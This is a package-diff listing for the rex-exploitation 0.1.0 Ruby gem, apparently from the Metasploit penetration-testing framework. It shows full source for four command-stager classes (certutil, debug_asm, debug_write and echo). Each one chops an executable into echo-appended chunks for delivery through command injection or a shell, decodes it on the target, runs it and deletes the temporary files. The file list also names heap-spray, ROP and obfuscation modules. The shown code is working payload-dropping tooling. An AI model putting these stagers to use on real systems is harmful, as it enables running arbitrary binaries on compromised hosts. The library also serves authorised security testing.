rex-exploitation 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
@@ -0,0 +1,114 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses Windows certutil to base64 decode a file,
|
16
|
+
# created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
#
|
19
|
+
# Written by xistence
|
20
|
+
# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
|
21
|
+
#
|
22
|
+
###
|
23
|
+
|
24
|
+
class CmdStagerCertutil < CmdStagerBase
|
25
|
+
|
26
|
+
def initialize(exe)
|
27
|
+
super
|
28
|
+
|
29
|
+
@var_encoded = Rex::Text.rand_text_alpha(5)
|
30
|
+
@var_decoded = Rex::Text.rand_text_alpha(5)
|
31
|
+
@decoder = nil # filled in later
|
32
|
+
end
|
33
|
+
|
34
|
+
|
35
|
+
# Override just to set the extra byte count
|
36
|
+
# @param opts [Array] The options to generate the command line
|
37
|
+
# @return [Array] The complete command line
|
38
|
+
def generate_cmds(opts)
|
39
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
40
|
+
@cmd_start = "echo "
|
41
|
+
@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
|
42
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
43
|
+
opts.merge!({ :extra => xtra_len })
|
44
|
+
super
|
45
|
+
end
|
46
|
+
|
47
|
+
|
48
|
+
# Simple base64 encoder for the executable
|
49
|
+
# @param opts [Array] The options to generate the command line
|
50
|
+
# @return [String] Base64 encoded executable
|
51
|
+
def encode_payload(opts)
|
52
|
+
Rex::Text.encode_base64(@exe)
|
53
|
+
end
|
54
|
+
|
55
|
+
|
56
|
+
# Combine the parts of the encoded file with the stuff that goes
|
57
|
+
# before / after it.
|
58
|
+
# @param parts [Array] Splitted commands
|
59
|
+
# @param opts [Array] The options to generate the command line
|
60
|
+
# @return [Array] The command line
|
61
|
+
def parts_to_commands(parts, opts)
|
62
|
+
|
63
|
+
cmds = []
|
64
|
+
parts.each do |p|
|
65
|
+
cmd = ''
|
66
|
+
cmd << @cmd_start
|
67
|
+
cmd << p
|
68
|
+
cmd << @cmd_end
|
69
|
+
cmds << cmd
|
70
|
+
end
|
71
|
+
|
72
|
+
cmds
|
73
|
+
end
|
74
|
+
|
75
|
+
|
76
|
+
# Generate the commands that will decode the file we just created
|
77
|
+
# @param opts [Array] The options to generate the command line
|
78
|
+
# @return [Array] The certutil Base64 decoder part of the command line
|
79
|
+
def generate_cmds_decoder(opts)
|
80
|
+
|
81
|
+
cmds = []
|
82
|
+
cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
|
83
|
+
return cmds
|
84
|
+
end
|
85
|
+
|
86
|
+
|
87
|
+
# We override compress commands just to stick in a few extra commands
|
88
|
+
# last second..
|
89
|
+
# @param cmds [Array] Complete command line
|
90
|
+
# @param opts [Array] Extra options for command line generation
|
91
|
+
# @return [Array] The complete command line including cleanup
|
92
|
+
def compress_commands(cmds, opts)
|
93
|
+
# Make it all happen
|
94
|
+
cmds << "#{@tempdir}#{@var_decoded}.exe"
|
95
|
+
|
96
|
+
# Clean up after unless requested not to..
|
97
|
+
if (not opts[:nodelete])
|
98
|
+
cmds << "del #{@tempdir}#{@var_encoded}.b64"
|
99
|
+
# NOTE: We won't be able to delete the exe while it's in use.
|
100
|
+
end
|
101
|
+
|
102
|
+
super
|
103
|
+
end
|
104
|
+
|
105
|
+
# Windows uses & to concat strings
|
106
|
+
#
|
107
|
+
# @return [String] Concat operator
|
108
|
+
def cmd_concat_operator
|
109
|
+
" & "
|
110
|
+
end
|
111
|
+
|
112
|
+
end
|
113
|
+
end
|
114
|
+
end
|
@@ -0,0 +1,139 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses debug.exe to assemble a small COM file. The COM will
|
16
|
+
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
# Requires: debug.exe
|
19
|
+
#
|
20
|
+
# Written by Joshua J. Drake
|
21
|
+
#
|
22
|
+
###
|
23
|
+
|
24
|
+
class CmdStagerDebugAsm < CmdStagerBase
|
25
|
+
|
26
|
+
def initialize(exe)
|
27
|
+
super
|
28
|
+
|
29
|
+
@var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
|
30
|
+
@var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
|
31
|
+
@var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
|
32
|
+
@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
|
33
|
+
@decoder = nil # filled in later
|
34
|
+
end
|
35
|
+
|
36
|
+
|
37
|
+
#
|
38
|
+
# Override just to set the extra byte count
|
39
|
+
#
|
40
|
+
def generate_cmds(opts)
|
41
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
42
|
+
@cmd_start = "echo "
|
43
|
+
@cmd_end = ">>#{@tempdir}#{@var_payload_in}"
|
44
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
45
|
+
opts.merge!({ :extra => xtra_len })
|
46
|
+
super
|
47
|
+
end
|
48
|
+
|
49
|
+
|
50
|
+
#
|
51
|
+
# Simple hex encoding...
|
52
|
+
#
|
53
|
+
def encode_payload(opts)
|
54
|
+
ret = @exe.unpack('H*')[0]
|
55
|
+
end
|
56
|
+
|
57
|
+
|
58
|
+
#
|
59
|
+
# Combine the parts of the encoded file with the stuff that goes
|
60
|
+
# before / after it.
|
61
|
+
#
|
62
|
+
def parts_to_commands(parts, opts)
|
63
|
+
|
64
|
+
cmds = []
|
65
|
+
parts.each do |p|
|
66
|
+
cmd = ''
|
67
|
+
cmd << @cmd_start
|
68
|
+
cmd << p
|
69
|
+
cmd << @cmd_end
|
70
|
+
cmds << cmd
|
71
|
+
end
|
72
|
+
|
73
|
+
cmds
|
74
|
+
end
|
75
|
+
|
76
|
+
|
77
|
+
#
|
78
|
+
# Generate the commands that will decode the file we just created
|
79
|
+
#
|
80
|
+
def generate_cmds_decoder(opts)
|
81
|
+
|
82
|
+
# Allow decoder stub override (needs to input base64 and output bin)
|
83
|
+
@decoder = opts[:decoder] if (opts[:decoder])
|
84
|
+
|
85
|
+
# Read the decoder data file
|
86
|
+
f = File.new(@decoder, "rb")
|
87
|
+
decoder = f.read(f.stat.size)
|
88
|
+
f.close
|
89
|
+
|
90
|
+
# Replace variables
|
91
|
+
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
|
92
|
+
decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
|
93
|
+
# NOTE: these two filenames MUST 8+3 chars long.
|
94
|
+
decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
|
95
|
+
decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
|
96
|
+
|
97
|
+
# Split it apart by the lines
|
98
|
+
decoder.split("\n")
|
99
|
+
end
|
100
|
+
|
101
|
+
|
102
|
+
#
|
103
|
+
# We override compress commands just to stick in a few extra commands
|
104
|
+
# last second..
|
105
|
+
#
|
106
|
+
def compress_commands(cmds, opts)
|
107
|
+
# Convert the debug script to an executable...
|
108
|
+
cvt_cmd = ''
|
109
|
+
if (@tempdir != '')
|
110
|
+
cvt_cmd << "cd %TEMP% && "
|
111
|
+
end
|
112
|
+
cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
|
113
|
+
cmds << cvt_cmd
|
114
|
+
|
115
|
+
# Convert the encoded payload...
|
116
|
+
cmds << "#{@tempdir}#{@var_decoder_com}"
|
117
|
+
|
118
|
+
# Make it all happen
|
119
|
+
cmds << "start #{@tempdir}#{@var_payload_out}"
|
120
|
+
|
121
|
+
# Clean up after unless requested not to..
|
122
|
+
if (not opts[:nodelete])
|
123
|
+
cmds << "del #{@tempdir}#{@var_decoder_asm}"
|
124
|
+
cmds << "del #{@tempdir}#{@var_decoder_com}"
|
125
|
+
cmds << "del #{@tempdir}#{@var_payload_in}"
|
126
|
+
# XXX: We won't be able to delete the payload while it is running..
|
127
|
+
end
|
128
|
+
|
129
|
+
super
|
130
|
+
end
|
131
|
+
|
132
|
+
# Windows uses & to concat strings
|
133
|
+
def cmd_concat_operator
|
134
|
+
" & "
|
135
|
+
end
|
136
|
+
|
137
|
+
end
|
138
|
+
end
|
139
|
+
end
|
@@ -0,0 +1,133 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides the ability to create a sequence of commands from an executable.
|
12
|
+
# When this sequence is ran via command injection or a shell, the resulting exe will
|
13
|
+
# be written to disk and executed.
|
14
|
+
#
|
15
|
+
# This particular version uses debug.exe to write a small .NET binary. That binary will
|
16
|
+
# take a hex-ascii file, created via echo >>, and decode it to the final binary.
|
17
|
+
#
|
18
|
+
# Requires: .NET, debug.exe
|
19
|
+
#
|
20
|
+
###
|
21
|
+
|
22
|
+
class CmdStagerDebugWrite < CmdStagerBase
|
23
|
+
|
24
|
+
def initialize(exe)
|
25
|
+
super
|
26
|
+
|
27
|
+
@var_bypass = Rex::Text.rand_text_alpha(8)
|
28
|
+
@var_payload = Rex::Text.rand_text_alpha(8)
|
29
|
+
@decoder = nil # filled in later
|
30
|
+
end
|
31
|
+
|
32
|
+
|
33
|
+
#
|
34
|
+
# Override just to set the extra byte count
|
35
|
+
#
|
36
|
+
def generate_cmds(opts)
|
37
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
38
|
+
@cmd_start = "echo "
|
39
|
+
@cmd_end = ">>#{@tempdir}#{@var_payload}"
|
40
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
41
|
+
opts.merge!({ :extra => xtra_len })
|
42
|
+
super
|
43
|
+
end
|
44
|
+
|
45
|
+
|
46
|
+
#
|
47
|
+
# Simple hex encoding...
|
48
|
+
#
|
49
|
+
def encode_payload(opts)
|
50
|
+
@exe.unpack('H*')[0]
|
51
|
+
end
|
52
|
+
|
53
|
+
|
54
|
+
#
|
55
|
+
# Combine the parts of the encoded file with the stuff that goes
|
56
|
+
# before / after it.
|
57
|
+
#
|
58
|
+
def parts_to_commands(parts, opts)
|
59
|
+
|
60
|
+
cmds = []
|
61
|
+
parts.each do |p|
|
62
|
+
cmd = ''
|
63
|
+
cmd << @cmd_start
|
64
|
+
cmd << p
|
65
|
+
cmd << @cmd_end
|
66
|
+
cmds << cmd
|
67
|
+
end
|
68
|
+
|
69
|
+
cmds
|
70
|
+
end
|
71
|
+
|
72
|
+
|
73
|
+
#
|
74
|
+
# Generate the commands that will decode the file we just created
|
75
|
+
#
|
76
|
+
def generate_cmds_decoder(opts)
|
77
|
+
|
78
|
+
# Allow decoder stub override (needs to input base64 and output bin)
|
79
|
+
@decoder = opts[:decoder] if (opts[:decoder])
|
80
|
+
|
81
|
+
# Read the decoder data file
|
82
|
+
f = File.new(@decoder, "rb")
|
83
|
+
decoder = f.read(f.stat.size)
|
84
|
+
f.close
|
85
|
+
|
86
|
+
# Replace variables
|
87
|
+
decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
|
88
|
+
|
89
|
+
# Split it apart by the lines
|
90
|
+
decoder.split("\n")
|
91
|
+
end
|
92
|
+
|
93
|
+
|
94
|
+
#
|
95
|
+
# We override compress commands just to stick in a few extra commands
|
96
|
+
# last second..
|
97
|
+
#
|
98
|
+
def compress_commands(cmds, opts)
|
99
|
+
# Convert the debug script to an executable...
|
100
|
+
cvt_cmd = ''
|
101
|
+
if (@tempdir != '')
|
102
|
+
cvt_cmd << "cd %TEMP% && "
|
103
|
+
end
|
104
|
+
cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
|
105
|
+
cmds << cvt_cmd
|
106
|
+
|
107
|
+
# Rename the resulting binary
|
108
|
+
cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
|
109
|
+
|
110
|
+
# Converting the encoded payload...
|
111
|
+
cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
|
112
|
+
|
113
|
+
# Make it all happen
|
114
|
+
cmds << "start #{@tempdir}#{@var_payload}.exe"
|
115
|
+
|
116
|
+
# Clean up after unless requested not to..
|
117
|
+
if (not opts[:nodelete])
|
118
|
+
cmds << "del #{@tempdir}#{@var_bypass}.exe"
|
119
|
+
cmds << "del #{@tempdir}#{@var_payload}"
|
120
|
+
# XXX: We won't be able to delete the payload while it is running..
|
121
|
+
end
|
122
|
+
|
123
|
+
super
|
124
|
+
end
|
125
|
+
|
126
|
+
# Windows uses & to concat strings
|
127
|
+
def cmd_concat_operator
|
128
|
+
" & "
|
129
|
+
end
|
130
|
+
|
131
|
+
end
|
132
|
+
end
|
133
|
+
end
|
@@ -0,0 +1,166 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
require 'shellwords'
|
6
|
+
|
7
|
+
module Rex
|
8
|
+
module Exploitation
|
9
|
+
|
10
|
+
class CmdStagerEcho < CmdStagerBase
|
11
|
+
|
12
|
+
ENCODINGS = {
|
13
|
+
'hex' => "\\\\x",
|
14
|
+
'octal' => "\\\\"
|
15
|
+
}
|
16
|
+
|
17
|
+
def initialize(exe)
|
18
|
+
super
|
19
|
+
|
20
|
+
@var_elf = Rex::Text.rand_text_alpha(5)
|
21
|
+
end
|
22
|
+
|
23
|
+
#
|
24
|
+
# Override to ensure opts[:temp] is a correct *nix path
|
25
|
+
# and initialize opts[:enc_format].
|
26
|
+
#
|
27
|
+
def generate(opts = {})
|
28
|
+
opts[:temp] = opts[:temp] || '/tmp/'
|
29
|
+
|
30
|
+
unless opts[:temp].empty?
|
31
|
+
opts[:temp].gsub!(/\\/, '/')
|
32
|
+
opts[:temp] = opts[:temp].shellescape
|
33
|
+
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
|
34
|
+
end
|
35
|
+
|
36
|
+
# by default use the 'hex' encoding
|
37
|
+
opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
|
38
|
+
|
39
|
+
unless ENCODINGS.keys.include?(opts[:enc_format])
|
40
|
+
raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
|
41
|
+
end
|
42
|
+
|
43
|
+
super
|
44
|
+
end
|
45
|
+
|
46
|
+
#
|
47
|
+
# Override to set the extra byte count
|
48
|
+
#
|
49
|
+
def generate_cmds(opts)
|
50
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
51
|
+
@cmd_start = "echo "
|
52
|
+
unless opts[:noargs]
|
53
|
+
@cmd_start += "-en "
|
54
|
+
end
|
55
|
+
|
56
|
+
@cmd_end = ">>#{@tempdir}#{@var_elf}"
|
57
|
+
xtra_len = @cmd_start.length + @cmd_end.length
|
58
|
+
opts.merge!({ :extra => xtra_len })
|
59
|
+
|
60
|
+
@prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
|
61
|
+
min_part_size = 5 # for both encodings
|
62
|
+
|
63
|
+
if (opts[:linemax] - opts[:extra]) < min_part_size
|
64
|
+
raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
|
65
|
+
end
|
66
|
+
|
67
|
+
super
|
68
|
+
end
|
69
|
+
|
70
|
+
|
71
|
+
#
|
72
|
+
# Encode into a format that echo understands, where
|
73
|
+
# interpretation of backslash escapes are enabled. For
|
74
|
+
# hex, it'll look like "\\x41\\x42", and octal will be
|
75
|
+
# "\\101\\102\\5\\41"
|
76
|
+
#
|
77
|
+
def encode_payload(opts)
|
78
|
+
case opts[:enc_format]
|
79
|
+
when 'octal'
|
80
|
+
return Rex::Text.to_octal(@exe, @prefix)
|
81
|
+
else
|
82
|
+
return Rex::Text.to_hex(@exe, @prefix)
|
83
|
+
end
|
84
|
+
end
|
85
|
+
|
86
|
+
|
87
|
+
#
|
88
|
+
# Combine the parts of the encoded file with the stuff that goes
|
89
|
+
# before ("echo -en ") / after (">>file") it.
|
90
|
+
#
|
91
|
+
def parts_to_commands(parts, opts)
|
92
|
+
parts.map do |p|
|
93
|
+
cmd = ''
|
94
|
+
cmd << @cmd_start
|
95
|
+
cmd << p
|
96
|
+
cmd << @cmd_end
|
97
|
+
cmd
|
98
|
+
end
|
99
|
+
end
|
100
|
+
|
101
|
+
#
|
102
|
+
# Since the binary has been already dropped to fs, just execute and
|
103
|
+
# delete it
|
104
|
+
#
|
105
|
+
def generate_cmds_decoder(opts)
|
106
|
+
cmds = []
|
107
|
+
# Make it all happen
|
108
|
+
cmds << "chmod 777 #{@tempdir}#{@var_elf}"
|
109
|
+
#cmds << "chmod +x #{@tempdir}#{@var_elf}"
|
110
|
+
cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
|
111
|
+
|
112
|
+
# Clean up after unless requested not to..
|
113
|
+
unless opts[:nodelete]
|
114
|
+
cmds << "rm -f #{@tempdir}#{@var_elf}"
|
115
|
+
end
|
116
|
+
|
117
|
+
return cmds
|
118
|
+
end
|
119
|
+
|
120
|
+
#
|
121
|
+
# Override it to ensure that the hex representation of a byte isn't cut
|
122
|
+
#
|
123
|
+
def slice_up_payload(encoded, opts)
|
124
|
+
encoded_dup = encoded.dup
|
125
|
+
|
126
|
+
parts = []
|
127
|
+
xtra_len = opts[:extra]
|
128
|
+
xtra_len ||= 0
|
129
|
+
while (encoded_dup.length > 0)
|
130
|
+
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
|
131
|
+
# cut the end of the part until we reach the start
|
132
|
+
# of a full byte representation "\\xYZ" or "\\YZX"
|
133
|
+
temp = fix_last_byte(temp, opts, encoded_dup)
|
134
|
+
parts << temp
|
135
|
+
encoded_dup.slice!(0, temp.length)
|
136
|
+
end
|
137
|
+
|
138
|
+
parts
|
139
|
+
end
|
140
|
+
|
141
|
+
def fix_last_byte(part, opts, remaining="")
|
142
|
+
fixed_part = part.dup
|
143
|
+
|
144
|
+
case opts[:enc_format]
|
145
|
+
when 'hex'
|
146
|
+
while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
|
147
|
+
fixed_part.chop!
|
148
|
+
end
|
149
|
+
when 'octal'
|
150
|
+
if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
|
151
|
+
pos = fixed_part.rindex('\\')
|
152
|
+
pos -= 1 if fixed_part[pos-1] == '\\'
|
153
|
+
fixed_part.slice!(pos..fixed_part.length-1)
|
154
|
+
end
|
155
|
+
end
|
156
|
+
|
157
|
+
return fixed_part
|
158
|
+
end
|
159
|
+
|
160
|
+
def cmd_concat_operator
|
161
|
+
" ; "
|
162
|
+
end
|
163
|
+
|
164
|
+
end
|
165
|
+
end
|
166
|
+
end
|